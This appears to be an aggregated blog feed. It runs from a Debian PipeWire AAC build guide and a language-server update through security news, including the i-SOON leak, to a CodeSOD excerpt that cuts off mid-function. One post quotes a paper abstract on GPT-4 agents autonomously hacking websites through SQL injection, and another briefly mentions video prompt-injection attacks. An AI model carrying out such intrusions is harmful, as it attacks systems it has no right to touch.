If what you, like me, need is simply for Bluetooth Audio to work with AAC in Debian’s default desktop environment2, then you’ll need to rebuild the pipewire package to include the AAC codec. While the current version in Debian main has been built with AAC deliberately disabled, it is trivial to enable if you can install a version of the fdk-aac library.

I preface this with the usual caveats when it comes to patent and licensing controversies. I am not a lawyer, building this package and/or using it could get you into legal trouble.

These instructions have only been tested on an up-to-date copy of Debian 12.

  1. Install pipewire’s build dependencies
    sudo apt install build-essential devscripts
    sudo apt build-dep pipewire
    
  2. Install libfdk-aac-dev
    sudo apt install libfdk-aac-dev
    

    If the above doesn’t work you’ll likely need to enable non-free and try again

    sudo sed -i 's/main/main non-free/g' /etc/apt/sources.list
    sudo apt update
    

    Alternatively, if you wish to ensure you are maximally license-compliant and patent un-infringing3, you can instead build fdk-aac-free which includes only those components of AAC that are known to be patent-free3. This is what should eventually end up in Debian to resolve this problem (see below).

    sudo apt install git-buildpackage
    mkdir fdk-aac-source
    cd fdk-aac-source
    git clone https://salsa.debian.org/multimedia-team/fdk-aac
    cd fdk-aac
    gbp buildpackage
    sudo dpkg -i ../libfdk-aac2_*deb ../libfdk-aac-dev_*deb
    
  3. Get the pipewire source code
    mkdir pipewire-source
    cd pipewire-source
    apt source pipewire
    

    This will create a bunch of files within the pipewire-source directory, but you’ll only need the pipewire-<version> folder, this contains all the files you’ll need to build the package, with all the debian-specific patches already applied. Note that you don’t want to run the apt source command as root, as it will then create files that your regular user cannot edit.

  4. Fix the dependencies and build options To fix up the build scripts to use the fdk-aac library, you need to save the following as pipewire-source/aac.patch
    --- debian/control.orig
    +++ debian/control
    @@ -40,8 +40,8 @@
                 modemmanager-dev,
                 pkg-config,
                 python3-docutils,
    -               systemd [linux-any]
    -Build-Conflicts: libfdk-aac-dev
    +               systemd [linux-any],
    +               libfdk-aac-dev
     Standards-Version: 4.6.2
     Vcs-Browser: https://salsa.debian.org/utopia-team/pipewire
     Vcs-Git: https://salsa.debian.org/utopia-team/pipewire.git
    --- debian/rules.orig
    +++ debian/rules
    @@ -37,7 +37,7 @@
     		-Dauto_features=enabled \
     		-Davahi=enabled \
     		-Dbluez5-backend-native-mm=enabled \
    -		-Dbluez5-codec-aac=disabled \
    +		-Dbluez5-codec-aac=enabled \
     		-Dbluez5-codec-aptx=enabled \
     		-Dbluez5-codec-lc3=enabled \
     		-Dbluez5-codec-lc3plus=disabled \
    

    Then you’ll need to run patch from within the pipewire-<version> folder created by apt source:

    patch -p0 < ../aac.patch
    
  5. Build pipewire
    cd pipewire-*
    debuild
    

    Note that you will likely see an error from debsign at the end of this process, this is harmless, you simply don’t have a GPG key set up to sign your newly-built package4. Packages don’t need to be signed to be installed, and debsign uses a somewhat non-standard signing process that dpkg does not check anyway.

  1. Install libspa-0.2-bluetooth
    sudo dpkg -i libspa-0.2-bluetooth_*.deb
    
  2. Restart PipeWire and/or Reboot
    sudo reboot
    

    Theoretically there’s a set of services to restart here that would get pipewire to pick up the new library, probably just pipewire itself. But it’s just as easy to restart and ensure everything is using the correct library.

Why

This is a slightly unusual situation, as the fdk-aac library is licensed under what even the GNU project acknowledges is a free software license. However, this license explicitly informs the user that they need to acquire a patent license to use this software5:

3. NO PATENT LICENSE

NO EXPRESS OR IMPLIED LICENSES TO ANY PATENT CLAIMS, including without limitation the patents of Fraunhofer, ARE GRANTED BY THIS SOFTWARE LICENSE. Fraunhofer provides no warranty of patent non-infringement with respect to this software. You may use this FDK AAC Codec software or modifications thereto only for purposes that are authorized by appropriate patent licenses.

To quote the GNU project:

Because of this, and because the license author is a known patent aggressor, we encourage you to be careful about using or redistributing software under this license: you should first consider whether the licensor might aim to lure you into patent infringement.

AAC is covered by a number of patents, which expire at some point in the 2030s6. As such the current version of the library is potentially legally dubious to ship with any other software, as it could be considered patent-infringing3.

Fedora’s solution

Since 2017, Fedora has included a modified version of the library as fdk-aac-free, see the announcement and the bugzilla bug requesting review.

This version of the library includes only the AAC LC profile, which is believed to be entirely patent-free3.

Based on this, there is an open bug report in Debian requesting that the fdk-aac package be moved to the main component and that the pipwire package be updated to build against it.

The Debian NEW queue

To resolve these bugs, a version of fdk-aac-free has been uploaded to Debian by Jeremy Bicha. However, to make it into Debian proper, it must first pass through the ftpmaster’s NEW queue. The current version of fdk-aac-free has been in the NEW queue since July 2023.

Based on conversations in some of the bugs above, it’s been there since at least 20227.

I hope this helps anyone stuck with AAC to get their hardware working for them while we wait for the package to eventually make it through the NEW queue.

Discuss on Hacker News

  1. Such as, for example, any Apple AirPods, which only support AAC AFAICT. 

  2. Which, as of Debian 12 is GNOME 3 under Wayland with PipeWire. 

  3. I’m not a lawyer, I don’t know what kinds of infringement might or might not be possible here, do your own research, etc.  2 3 4

  4. And if you DO have a key setup with debsign you almost certainly don’t need these instructions. 

  5. This was originally phrased as “explicitly does not grant any patent rights.” It was pointed out on Hacker News that this is not exactly what it says, as it also includes a specific note that you’ll need to acquire your own patent license. I’ve now quoted the relevant section of the license for clarity. 

  6. Wikipedia claims the “base” patents expire in 2031, with the extensions expiring in 2038, but its source for these claims is some guy’s spreadsheet in a forum. The same discussion also brings up Wikipedia’s claim and casts some doubt on it, so I’m not entirely sure what’s correct here, but I didn’t feel like doing a patent deep-dive today. If someone can provide a clear answer that would be much appreciated. 

  7. According to Jeremy Bícha: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021370#17 

,

Planet DebianNiels Thykier: Language Server for Debian: Spellchecking

This is my third update on writing a language server for Debian packaging files, which aims at providing a better developer experience for Debian packagers.

Lets go over what have done since the last report.

Semantic token support

I have added support for what the Language Server Protocol (LSP) call semantic tokens. These are used to provide the editor insights into tokens of interest for users. Allegedly, this is what editors would use for syntax highlighting as well.

Unfortunately, eglot (emacs) does not support semantic tokens, so I was not able to test this. There is a 3-year old PR for supporting with the last update being ~3 month basically saying "Please sign the Copyright Assignment". I pinged the GitHub issue in the hopes it will get unstuck.

For good measure, I also checked if I could try it via neovim. Before installing, I read the neovim docs, which helpfully listed the features supported. Sadly, I did not spot semantic tokens among those and parked from there.

That was a bit of a bummer, but I left the feature in for now. If you have an LSP capable editor that supports semantic tokens, let me know how it works for you! :)

Spellchecking

Finally, I implemented something Otto was missing! :)

This stared with Paul Wise reminding me that there were Python binding for the hunspell spellchecker. This enabled me to get started with a quick prototype that spellchecked the Description fields in debian/control. I also added spellchecking of comments while I was add it.

The spellchecker runs with the standard en_US dictionary from hunspell-en-us, which does not have a lot of technical terms in it. Much less any of the Debian specific slang. I spend considerable time providing a "built-in" wordlist for technical and Debian specific slang to overcome this. I also made a "wordlist" for known Debian people that the spellchecker did not recognise. Said wordlist is fairly short as a proof of concept, and I fully expect it to be community maintained if the language server becomes a success.

My second problem was performance. As I had suspected that spellchecking was not the fastest thing in the world. Therefore, I added a very small language server for the debian/changelog, which only supports spellchecking the textual part. Even for a small changelog of a 1000 lines, the spellchecking takes about 5 seconds, which confirmed my suspicion. With every change you do, the existing diagnostics hangs around for 5 seconds before being updated. Notably, in emacs, it seems that diagnostics gets translated into an absolute character offset, so all diagnostics after the change gets misplaced for every character you type.

Now, there is little I could do to speed up hunspell. But I can, as always, cheat. The way diagnostics work in the LSP is that the server listens to a set of notifications like "document opened" or "document changed". In a response to that, the LSP can start its diagnostics scanning of the document and eventually publish all the diagnostics to the editor. The spec is quite clear that the server owns the diagnostics and the diagnostics are sent as a "notification" (that is, fire-and-forgot). Accordingly, there is nothing that prevents the server from publishing diagnostics multiple times for a single trigger. The only requirement is that the server publishes the accumulated diagnostics in every publish (that is, no delta updating).

Leveraging this, I had the language server for debian/changelog scan the document and publish once for approximately every 25 typos (diagnostics) spotted. This means you quickly get your first result and that clears the obsolete diagnostics. Thereafter, you get frequent updates to the remainder of the document if you do not perform any further changes. That is, up to a predefined max of typos, so we do not overload the client for longer changelogs. If you do any changes, it resets and starts over.

The only bit missing was dealing with concurrency. By default, a pygls language server is single threaded. It is not great if the language server hangs for 5 seconds everytime you type anything. Fortunately, pygls has builtin support for asyncio and threaded handlers. For now, I did an async handler that await after each line and setup some manual detection to stop an obsolete diagnostics run. This means the server will fairly quickly abandon an obsolete run.

Also, as a side-effect of working on the spellchecking, I fixed multiple typos in the changelog of debputy. :)

Follow up on the "What next?" from my previous update

In my previous update, I mentioned I had to finish up my python-debian changes to support getting the location of a token in a deb822 file. That was done, the MR is now filed, and is pending review. Hopefully, it will be merged and uploaded soon. :)

I also submitted my proposal for a different way of handling relationship substvars to debian-devel. So far, it seems to have received only positive feedback. I hope it stays that way and we will have this feature soon. Guillem proposed to move some of this into dpkg, which might delay my plans a bit. However, it might be for the better in the long run, so I will wait a bit to see what happens on that front. :)

As noted above, I managed to add debian/changelog as a support format for the language server. Even if it only does spellchecking and trimming of trailing newlines on save, it technically is a new format and therefore cross that item off my list. :D

Unfortunately, I did not manage to write a linter variant that does not involve using an LSP-capable editor. So that is still pending. Instead, I submitted an MR against elpa-dpkg-dev-el to have it recognize all the fields that the debian/control LSP knows about at this time to offset the lack of semantic token support in eglot.

From here...

My sprinting on this topic will soon come to an end, so I have to a bit more careful now with what tasks I open!

I think I will narrow my focus to providing a batch linting interface. Ideally, with an auto-fix for some of the more mechanical issues, where this is little doubt about the answer.

Additionally, I think the spellchecking will need a bit more maturing. My current code still trips on naming patterns that are "clearly" verbatim or code references like things written in CamelCase or SCREAMING_SNAKE_CASE. That gets annoying really quickly. It also trips on a lot of commands like dpkg-gencontrol, but that is harder to fix since it could have been a real word. I think those will have to be fixed people using quotes around the commands. Maybe the most popular ones will end up in the wordlist.

Beyond that, I will play it by ear if I have any time left. :)

365 TomorrowsWhy We Banned Time Travel

Author: David Barber Even grandfathers fearful of paradox— in case squashing a butterfly alters the future—had no cause to fret, because the time engine emerged in low Earth orbit and just took pictures. What could go wrong? Instruments gazed down on a warm, pristine planet, dominated by behemoths. Sometimes herds could be glimpsed from space. […]

The post Why We Banned Time Travel appeared first on 365tomorrows.

David BrinRepublican rationalizations are unchanged, even in the face of ... facts

Down at the end, I'll offer an excerpt from an essay on my alternate site asking "Does government-funded science play a role in stimulating innovation?" Both the far-left and today's entire-right share in common a cult reflex answer to that question. An answer emblematic of the lobotomization of our time.

But do hang around for that excerpt, at least!

== Another milestone raises a serious question ==

With the passing of the "Greatest Generation" (GG) - parents of the boomers - and now Jimmy and Rosalynn Carter - perhaps it's time to re-evaluate the America... and world... that they made.

Especially the Rooseveltean social contract that transformed the USA into a world titan, science-leader and awash in wealth, while setting us down an inexorable road toward some kinds of equality: first regarding social/working class. But then (admittedly far too-slowly!) race/gender and the rest.

That social contract directly correlated with the highest rates of middle class prosperity increase, fastest startup entrepreneurship and lowest levels of wealth disparity the world had ever seen. But it has been - since the 1980s - carved-away on a range of incantatory excuses and partially demolished by a massive campaign of conservative 'reforms'...  

...economic and social theories that were supposedly aimed at enhancing creative market freedom, but that correlated exactly and always with reduction of innovation and competition, while restoring the one trait that the Greatest Generation despised most... born-class as the primary decider of a child's destiny. 

This campaign was justified by guys like Milton Friedman and Robert Bork, and think tanks such as Heritage and AEI, that continue pushing utterly-disproved notions like "Supply Side (voodoo) Economics" - that never had one successfully predicted positive outcome.  

(In science, a theory is abandoned in the face of relentless predictive failure, but cults don't do that.)

In the 90s, those pro-oligarchy economists were augmented by "neocon" imperialists who urged both Bushes and Dick Cheney etc. to plunge us into blatant traps that had been laid for us by Osama bin Laden and his ilk. Those Middle Eastern wars were supposedly in revenge for 9/11 attacks that (always remember) happened on their watch. The neocons openly brayed their ill-disguised glee at transforming an 80% benign American Pax into a thumping, gallumphing empire.


(My hero - George Marshall - held meetings in 1945 revolving around a question that no leader had ever asked, before: "We are about to become an empire. What mistakes did all other empires make and how can we make something that succeeds? That won't make us hated and eventually destroyed?" (paraphrased))

Look at the blared yowls of Wolfowitz, Nitze, Adelman and the other neocons, in those days, and tell us you see any signs of wisdom, or awareness of the traps they were falling for.  Alas for them, their orgiastic era was brief. America soon soured on imperial preenings that distilled down to $trillion dollar ripoffs. At which point those poor neocons were promptly flushed away by the Republican establishment - without even a word of thanks - as oligarchy decided to veer republicanism away from armed adventures, over to populist/isolationist/lobotomizing/nerd-hating classic confederatism... now called Trumpism or MAGA.

But don't be distracted... all along, those apparent gyrations were superficialities. The central goal has always been the same. To defend and expand "supply side" tax grifts for aristocracy while crippling the Internal Revenue Service, so that a myriad cheats and thefts should remain hidden. 

Scan from 1981 to present. That sole priority was the only consistent policy position of the GOP and the only one always enacted, whenever they got power. 

(Other than that, and recently the abortion mania, can you name any actual legislative activity by GOP Congresses, the laziest in US history?)

No other 'priority' (e.g. the border) got more than lip service. That is, until the virulently riled MAGAs ('Do you still think you can control them?' Watch Cabaret!) demanded real action on abortion and other social incitements.

A lot of dems/libs went along with Supply Side (SS) in the 80s and even 90s, until, by it's 4th round, the effects grew clear: that not a single positive outcome prediction - not one - ever came true. 

Industrial investment? Nada, zip. As Adam Smith predicted, the vast waves of grifted lucre were poured by the rich into passive, parasitical 'rentier investments like real estate and bonds and tax havens. (A third of US housing stock was snapped-up by inheritance brats in cash purchases, immune to interest rates. It's why young couples can't buy homes.)

As for investment in manufacturing? Recipients of Supply Side largess did almost none. America's current, booming re-industrialization only began with the 2021-2 Pelosi bills.


== Why does no one point this out? ==

Well, Robert Reich does. Like the pure fact that federal deficits always worsen across GOP rule and after SS tax grifts (duh?)

Any non-hypocrite, competition-friendly conservative would realize by now that ONLY 
democrats enact pro-competition and pro-liberty measures. (Have your attorney contact me when you have escrowed $$$ wager stakes over that assertion; but first look at things like the ICC, CAB, AT&T and the damned War on Drugs - and now on reproductive rights.)

Here, in this New York Times article - Google on Trial - a corner of this program is appraised -- whether anti-trust laws can and should be used to break up super-corporations like Google who have inherent advantages. And yeah, that's a major issue. Cory Doctorow rails about it, entertainingly.

Left out are more imaginative solutions. Like whether it's time to help mom & pop America and get needed revenue by instituting a 5% National Sales Tax on interstate internet purchases. Since you-know-who (a South American river) is no longer a baby - but now a market dominating behemoth. In fact, since we all rely on that central market, without much other choice, isn't that the very definition of a public utility? (Ponder that. Treat that unavoidable e-marketplace like electricity and water and trash pickup. If there's no competition, then regulate it to be flat-fair-for-all?)

But the core issue that I keep returning to is one of tactics - at which Democrats (the Union Side in this 8th phase of the 250 year U.S. Civil War) have proved utterly inept! 

It's the reason why I wrote Polemical Judo. A few better tactics and we could peel away just one million residually sane Republicans, leaving the Confederacy in a state of utter, demographic collapse. 

(Of course then the oligarchs will resort to more violent versions of incitement; but we have skilled defenders working on that, right now, e.g. in the much maligned heroes of the FBI.)


And this...


In this conversation, Evan Anderson, CEO of INVNT/IP, an expert on global manufacturing and supply chains, takes us on a deep dive into the power dynamics between the United States, China, and Taiwan.



== Merits and drawbacks of government-funded science ==


And finally, as promised, here's that excerpt from an essay on my more formal, WordPress site asking "Does government-funded science play a role in stimulating innovation?"

There's a deep-cult that underlies many of our familiar political cults. What do the far left and today's entire right share in common? A desperate urge to AMPUTATE our options and methods down to only the few that they prescribe. And hence I posted (on my formal WordPress site) a dissection of this shared, sanctimoniously-oversimplifying, mania.

If you are interested in this... and especially whether government-funded science has played a big role in "Making America (and civilization) Great," then drop on by.


,

Cryptogram Details of a Phone Scam

First-person account of someone who fell for a scam, that started as a fake Amazon service rep and ended with a fake CIA agent, and lost $50,000 cash. And this is not a naive or stupid person.

The details are fascinating. And if you think it couldn’t happen to you, think again. Given the right set of circumstances, it can.

It happened to Cory Doctorow.

EDITED TO ADD (2/23): More scams, these involving timeshares.

Cryptogram Apple Announces Post-Quantum Encryption Algorithms for iMessage

Apple announced PQ3, its post-quantum encryption standard based on the Kyber secure key-encapsulation protocol, one of the post-quantum algorithms selected by NIST in 2022.

There’s a lot of detail in the Apple blog post, and more in Douglas Stabila’s security analysis.

I am of two minds about this. On the one hand, it’s probably premature to switch to any particular post-quantum algorithms. The mathematics of cryptanalysis for these lattice and other systems is still rapidly evolving, and we’re likely to break more of them—and learn a lot in the process—over the coming few years. But if you’re going to make the switch, this is an excellent choice. And Apple’s ability to do this so efficiently speaks well about its algorithmic agility, which is probably more important than its particular cryptographic design. And it is probably about the right time to worry about, and defend against, attackers who are storing encrypted messages in hopes of breaking them later on future quantum computers.

Cryptogram AIs Hacking Websites

New research:

LLM Agents can Autonomously Hack Websites

Abstract: In recent years, large language models (LLMs) have become increasingly capable and can now interact with tools (i.e., call functions), read documents, and recursively call themselves. As a result, these LLMs can now function autonomously as agents. With the rise in capabilities of these agents, recent work has speculated on how LLM agents would affect cybersecurity. However, not much is known about the offensive capabilities of LLM agents.

In this work, we show that LLM agents can autonomously hack websites, performing tasks as complex as blind database schema extraction and SQL injections without human feedback. Importantly, the agent does not need to know the vulnerability beforehand. This capability is uniquely enabled by frontier models that are highly capable of tool use and leveraging extended context. Namely, we show that GPT-4 is capable of such hacks, but existing open-source models are not. Finally, we show that GPT-4 is capable of autonomously finding vulnerabilities in websites in the wild. Our findings raise questions about the widespread deployment of LLMs.

Cryptogram Microsoft Is Spying on Users of Its AI Tools

Microsoft announced that it caught Chinese, Russian, and Iranian hackers using its AI tools—presumably coding tools—to improve their hacking abilities.

From their report:

In collaboration with OpenAI, we are sharing threat intelligence showing detected state affiliated adversaries—tracked as Forest Blizzard, Emerald Sleet, Crimson Sandstorm, Charcoal Typhoon, and Salmon Typhoon—using LLMs to augment cyberoperations.

The only way Microsoft or OpenAI would know this would be to spy on chatbot sessions. I’m sure the terms of service—if I bothered to read them—gives them that permission. And of course it’s no surprise that Microsoft and OpenAI (and, presumably, everyone else) are spying on our usage of AI, but this confirms it.

EDITED TO ADD (2/22): Commentary on my use of the word “spying.”

Planet DebianScarlett Gately Moore: Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads.

Witch Wells AZ SunsetWitch Wells AZ Sunset

It has been a very busy 3 weeks here in Kubuntu!

Kubuntu 22.04.4 LTS has been released and can be downloaded from here: https://kubuntu.org/getkubuntu/

Work done for the upcoming 24.04 LTS release:

  • Frameworks 5.115 is in proposed waiting for the Qt transition to complete.
  • Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.
  • Applications 23.08.5 is being worked on right now.
  • Added support for riscv64 hardware.
  • Bug triaging and several fixes!
  • I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!
  • Aaron and the Kfocus team has been doing some amazing work getting Calamares perfected for release! Thank you!
  • Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!
  • I have added several more apparmor profiles for packages affected by https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844
  • I have aligned our meta package to adhere to https://community.kde.org/Distributions/Packaging_Recommendations and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!

We have a branding contest! Please do enter, there are some exciting prizes https://kubuntu.org/news/kubuntu-graphic-design-contest/

Debian:

I have uploaded to NEW the following packages:

  • kde-inotify-survey
  • plank-player
  • aura-browser

I am currently working on:

  • alligator
  • xwaylandvideobridge

KDE Snaps:

KDE applications 23.08.5 have been uploaded to Candidate channel, testing help welcome. https://snapcraft.io/search?q=KDE I have also working on bug fixes, time allowing.

My continued employment depends on you, please consider a donation! https://kubuntu.org/donate/

Thank you for stopping by!

~Scarlett

Worse Than FailureError'd: Hard Daze Night

It was an extraordinarily busy week at Error'd HQ. The submission list had an all-time record influx, enough for a couple of special edition columns. Among the list was an unusual PEBKAC. We don't get many of these so it made me chuckle and that's really all it takes to get a submission into the mix.

Headliner Lucio Crusca perseverated "Here's what I found this morning, after late night working yesterday, sitting on my couch, with my Thinkpad on my lap. No, it was not my Debian who error'd. I'm afraid it was me."

lavor

 

Eagle-eyed Ken S. called out Wells Fargo: "I see it just fine." Ditto.

horse

 

Logical Mark W. insists "If you press 'Cancel', you are not cancelling; instead, you are cancelling the cancellation. Can we cancel this please?"

cancel

 

Peter pondered "Should I try to immediately delete, or is it safer to immediately delete?"

delete

 

No relation to Ken S., Legal Eagle lamented "Due to my poor LTAS scores and borderline illetteracy, it was very hard for me to get into user_SchoolName. There is so much reading!" Hang in there, L. Eagle. With a resume like yours, I'm sure there will be work for you in Florida after graduation. Only the best!

lexis

 

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

365 TomorrowsTime to Wake Up!

Author: Bill Cox “What’s happened?” The Captain’s voice was a harsh rasp, his throat still raw from the cryo-fluid. “The ship has experienced a failure of one of the three cold fusion engines due to a catastrophic meteor strike,” the mainframe avatar replied. “We have diverged substantially from our planned route and are now on […]

The post Time to Wake Up! appeared first on 365tomorrows.

Planet DebianGunnar Wolf: 10 things software developers should learn about learning

This post is a review for Computing Reviews for 10 things software developers should learn about learning , a article published in Communications of the ACM

As software developers, we understand the detailed workings of the different components of our computer systems. And–probably due to how computers were presented since their appearance as “digital brains” in the 1940s–we sometimes believe we can transpose that knowledge to how our biological brains work, be it as learners or as problem solvers. This article aims at making the reader understand several mechanisms related to how learning and problem solving actually work in our brains. It focuses on helping expert developers convey knowledge to new learners, as well as learners who need to get up to speed and “start coding.” The article’s narrative revolves around software developers, but much of what it presents can be applied to different problem domains.

The article takes this mission through ten points, with roughly the same space given to each of them, starting with wrong assumptions many people have about the similarities between computers and our brains. The first section, “Human Memory Is Not Made of Bits,” explains the brain processes of remembering as a way of strengthening the force of a memory (“reconsolidation”) and the role of activation in related network pathways. The second section, “Human Memory Is Composed of One Limited and One Unlimited System,” goes on to explain the organization of memories in the brain between long-term memory (functionally limitless, permanent storage) and working memory (storing little amounts of information used for solving a problem at hand). However, the focus soon shifts to how experience in knowledge leads to different ways of using the same concepts, the importance of going from abstract to concrete knowledge applications and back, and the role of skills repetition over time.

Toward the end of the article, the focus shifts from the mechanical act of learning to expertise. Section 6, “The Internet Has Not Made Learning Obsolete,” emphasizes that problem solving is not just putting together the pieces of a puzzle; searching online for solutions to a problem does not activate the neural pathways that would get fired up otherwise. The final sections tackle the differences that expertise brings to play when teaching or training a newcomer: the same tools that help the beginner’s productivity as “training wheels” will often hamper the expert user’s as their knowledge has become automated.

The article is written with a very informal and easy-to-read tone and vocabulary, and brings forward several issues that might seem like commonsense but do ring bells when it comes to my own experiences both as a software developer and as a teacher. The article closes by suggesting several books that further expand on the issues it brings forward. While I could not identify a single focus or thesis with which to characterize this article, the several points it makes will likely help readers better understand (and bring forward to consciousness) mental processes often taken for granted, and consider often-overlooked aspects when transmitting knowledge to newcomers.

,

Cryptogram New Image/Video Prompt Injection Attacks

Simon Willison has been playing with the video processing capabilities of the new Gemini Pro 1.5 model from Google, and it’s really impressive.

Which means a lot of scary new video prompt injection attacks. And remember, given the current state of technology, prompt injection attacks are impossible to prevent in general.

Krebs on SecurityNew Leak Shows Business Side of China’s APT Menace

A new data leak that appears to have come from one of China’s top private cybersecurity firms provides a rare glimpse into the commercial side of China’s many state-sponsored hacking groups. Experts say the leak illustrates how Chinese government agencies increasingly are contracting out foreign espionage campaigns to the nation’s burgeoning and highly competitive cybersecurity industry.

A marketing slide deck promoting i-SOON’s Advanced Persistent Threat (APT) capabilities.

A large cache of more than 500 documents published to GitHub last week indicate the records come from i-SOON, a technology company headquartered in Shanghai that is perhaps best known for providing cybersecurity training courses throughout China. But the leaked documents, which include candid employee chat conversations and images, show a less public side of i-SOON, one that frequently initiates and sustains cyberespionage campaigns commissioned by various Chinese government agencies.

The leaked documents suggest i-SOON employees were responsible for a raft of cyber intrusions over many years, infiltrating government systems in the United Kingdom and countries throughout Asia. Although the cache does not include raw data stolen from cyber espionage targets, it features numerous documents listing the level of access gained and the types of data exposed in each intrusion.

Security experts who reviewed the leaked data say they believe the information is legitimate, and that i-SOON works closely with China’s Ministry of Public Security and the military. In 2021, the Sichuan provincial government named i-SOON as one of “the top 30 information security companies.”

“The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China’s cyber espionage ecosystem,” said Dakota Cary, a China-focused consultant at the security firm SentinelOne. “It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire.”

Mei Danowski is a former intelligence analyst and China expert who now writes about her research in a Substack publication called Natto Thoughts. Danowski said i-SOON has achieved the highest secrecy classification that a non-state-owned company can receive, which qualifies the company to conduct classified research and development related to state security.

i-SOON’s “business services” webpage states that the company’s offerings include public security, anti-fraud, blockchain forensics, enterprise security solutions, and training. Danowski said that in 2013, i-SOON established a department for research on developing new APT network penetration methods.

APT stands for Advanced Persistent Threat, a term that generally refers to state-sponsored hacking groups. Indeed, among the documents apparently leaked from i-SOON is a sales pitch slide boldly highlighting the hacking prowess of the company’s “APT research team” (see screenshot above).

i-SOON CEO Wu Haibo, in 2011. Image: nattothoughts.substack.com.

The leaked documents included a lengthy chat conversation between the company’s founders, who repeatedly discuss flagging sales and the need to secure more employees and government contracts. Danowski said the CEO of i-SOON, Wu Haibo (“Shutdown” in the leaked chats) is a well-known first-generation red hacker or “Honker,” and an early member of Green Army — the very first Chinese hacktivist group founded in 1997. Mr. Haibo has not yet responded to a request for comment.

In October 2023, Danowski detailed how i-SOON became embroiled in a software development contract dispute when it was sued by a competing Chinese cybersecurity company called Chengdu 404. In September 2020, the U.S. Department of Justice unsealed indictments against multiple Chengdu 404 employees, charging that the company was a facade that hid more than a decade’s worth of cyber intrusions attributed to a threat actor group known as “APT 41.”

Danowski said the existence of this legal dispute suggests that Chengdu 404 and i-SOON have or at one time had a business relationship, and that one company likely served as a subcontractor to the other.

“From what they chat about we can see this is a very competitive industry, where companies in this space are constantly poaching each others’ employees and tools,” Danowski said. “The infosec industry is always trying to distinguish [the work] of one APT group from another. But that’s getting harder to do.”

It remains unclear if i-SOON’s work has earned it a unique APT designation. But Will Thomas, a cyber threat intelligence researcher at Equinix, found an Internet address in the leaked data that corresponds to a domain flagged in a 2019 Citizen Lab report about one-click mobile phone exploits that were being used to target groups in Tibet. The 2019 report referred to the threat actor behind those attacks as an APT group called Poison Carp.

Several images and chat records in the data leak suggest i-SOON’s clients periodically gave the company a list of targets they wanted to infiltrate, but sometimes employees confused the instructions. One screenshot shows a conversation in which an employee tells his boss they’ve just hacked one of the universities on their latest list, only to be told that the victim in question was not actually listed as a desired target.

The leaked chats show i-SOON continuously tried to recruit new talent by hosting a series of hacking competitions across China. It also performed charity work, and sought to engage employees and sustain morale with various team-building events.

However, the chats include multiple conversations between employees commiserating over long hours and low pay. The overall tone of the discussions indicates employee morale was quite low and that the workplace environment was fairly toxic. In several of the conversations, i-SOON employees openly discuss with their bosses how much money they just lost gambling online with their mobile phones while at work.

Danowski believes the i-SOON data was probably leaked by one of those disgruntled employees.

“This was released the first working day after the Chinese New Year,” Danowski said. “Definitely whoever did this planned it, because you can’t get all this information all at once.”

SentinelOne’s Cary said he came to the same conclusion, noting that the Protonmail account tied to the GitHub profile that published the records was registered a month before the leak, on January 15, 2024.

China’s much vaunted Great Firewall not only lets the government control and limit what citizens can access online, but this distributed spying apparatus allows authorities to block data on Chinese citizens and companies from ever leaving the country.

As a result, China enjoys a remarkable information asymmetry vis-a-vis virtually all other industrialized nations. Which is why this apparent data leak from i-SOON is such a rare find for Western security researchers.

“I was so excited to see this,” Cary said. “Every day I hope for data leaks coming out of China.”

That information asymmetry is at the heart of the Chinese government’s cyberwarfare goals, according to a 2023 analysis by Margin Research performed on behalf of the Defense Advanced Research Projects Agency (DARPA).

“In the area of cyberwarfare, the western governments see cyberspace as a ‘fifth domain’ of warfare,” the Margin study observed. “The Chinese, however, look at cyberspace in the broader context of information space. The ultimate objective is, not ‘control’ of cyberspace, but control of information, a vision that dominates China’s cyber operations.”

The National Cybersecurity Strategy issued by the White House last year singles out China as the biggest cyber threat to U.S. interests. While the United States government does contract certain aspects of its cyber operations to companies in the private sector, it does not follow China’s example in promoting the wholesale theft of state and corporate secrets for the commercial benefit of its own private industries.

Dave Aitel, a co-author of the Margin Research report and former computer scientist at the U.S. National Security Agency, said it’s nice to see that Chinese cybersecurity firms have to deal with all of the same contracting headaches facing U.S. companies seeking work with the federal government.

“This leak just shows there’s layers of contractors all the way down,” Aitel said. “It’s pretty fun to see the Chinese version of it.”

Worse Than FailureCodeSOD: The Default Path

I've had the misfortune to inherit a VB .Net project which started life as a VB6 project, but changed halfway through. Such projects are at best confused, mixing idioms of VB6's not-quite object oriented programming with .NET's more modern OO paradigms, plus all the chaos that a mid-project lanugage change entails. Honestly, one of the worst choices Microsoft ever made (and they have made a lot of bad choices) was trying to pretend that VB6 could easily transition into VB .Net. It was a lie that too many managers fell for, and too many developers had to try and make true.

Maurice inherited one of these projects. Even worse, the project started in a municipal IT department then was handed of to a large consulting company. Said consulting company then subcontracted the work out to the lowest bidder, who also subcontracted out to an even lower bidder. Things spiraled out of control, and the resulting project had 5,188 GOTO statements in 1321 code files. None of the code used Option Explicit (which requires you to define variables before you use them), or Option Strict (which causes errors when you misuse implicit data-type conversions). In lieu of any error handling, it just pops up message boxes when things go wrong.

Private Function getDefaultPath(ByRef obj As Object, ByRef Categoryid As Integer) As String
              Dim sQRY As String
           Dim dtSysType As New DataTable
              Dim iMPTaxYear As Integer
            Dim lEffTaxYear As Long
            Dim dtControl As New DataTable
               Const sSDATNew As String = "NC"
           getDefaultPath = False
          sQRY = "select TAXBILLINGYEAR from t_controltable"
           dtControl = goDB.GetDataTable("Control", sQRY)
            iMPTaxYear = dtControl.Rows(0).Item("TAXBILLINGYEAR")
            'iMPTaxYear = CShort(cmbTaxYear.Text)
            If goCalendar.effTaxYearByTaxYear(iMPTaxYear, lEffTaxYear) Then

            End If

         sQRY = " "
              sQRY = "select * from T_SysType where MTYPECODE = '" & sSDATNew & "'" & _
               " and msystypecategoryid = " & Categoryid & " and meffstatus = 'A' and " & _
             lEffTaxYear & " between mbegTaxYear and mendTaxYear"
            dtSysType = goDB.GetDataTable("SysType", sQRY)

             If dtSysType.Rows.Count > 0 Then
